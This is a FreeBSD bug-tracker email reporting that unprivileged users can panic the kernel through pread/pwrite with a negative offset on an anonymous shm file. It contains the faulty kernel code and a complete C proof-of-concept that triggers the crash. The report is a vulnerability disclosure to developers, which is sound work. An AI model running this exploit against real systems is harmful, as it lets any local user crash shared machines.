Skip site navigation (1)Skip section navigation (2) 
Date:      Tue, 28 Feb 2017 19:39:52 +0000
From:      bugzilla-noreply@freebsd.org
To:        freebsd-bugs@FreeBSD.org
Subject:   [Bug 217429] Users can cause NULL pointer deref and panic with shm file and pread/pwrite
Message-ID:  <bug-217429-8@https.bugs.freebsd.org/bugzilla/>
next in thread | raw e-mail | index | archive | help 
https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=3D217429

            Bug ID: 217429
           Summary: Users can cause NULL pointer deref and panic with shm
                    file and pread/pwrite
           Product: Base System
           Version: 10.3-RELEASE
          Hardware: Any
                OS: Any
            Status: New
          Severity: Affects Many People
          Priority: ---
         Component: kern
          Assignee: freebsd-bugs@FreeBSD.org
          Reporter: tim.newsham@nccgroup.trust

/*
 * shmcrash.c
 *     Crash FreeBSD with pread/pwrite on a shm file.

Description:
Anon shm files create with shm_open have a NULL fp->f_vnode.
But shm_preadv and shm_pwritev will access through this pointer
when the offset is negative:

    error =3D fget_read(td, fd, cap_rights_init(&rights, CAP_PREAD), &fp);
    if (error)
        return (error);
    if (!(fp->f_ops->fo_flags & DFLAG_SEEKABLE))
        error =3D ESPIPE;
    else if (offset < 0 && fp->f_vnode->v_type !=3D VCHR)
        error =3D EINVAL;
    else
        error =3D dofileread(td, fd, fp, auio, offset, FOF_OFFSET);

This causes a NULL pointer dereference in kernel, and a panic.
No privileges are required.
 */

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <fcntl.h>
#include <unistd.h>

void xperror(char *msg) {
    perror(msg);
    exit(1);
}

int main(int argc, char **argv)
{
    char buf[64];
    int fd, x, w;

    w =3D (argc =3D=3D 2 && argv[1][0] =3D=3D 'w');
    printf("we will %s\n", w ? "write" : "read");

    fd =3D shm_open(SHM_ANON, O_RDWR, 0);
    if(fd =3D=3D -1) xperror("shm_open");
    printf("fd %d\n", fd); fflush(stdout);

    if(w)
        x =3D pwrite(fd, "test", 4, -1);
    else
        x =3D pread(fd, buf, sizeof buf, -1);
    printf("io %d\n", x);
    return 0;
}

--=20
You are receiving this mail because:
You are the assignee for the bug.=

Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?bug-217429-8>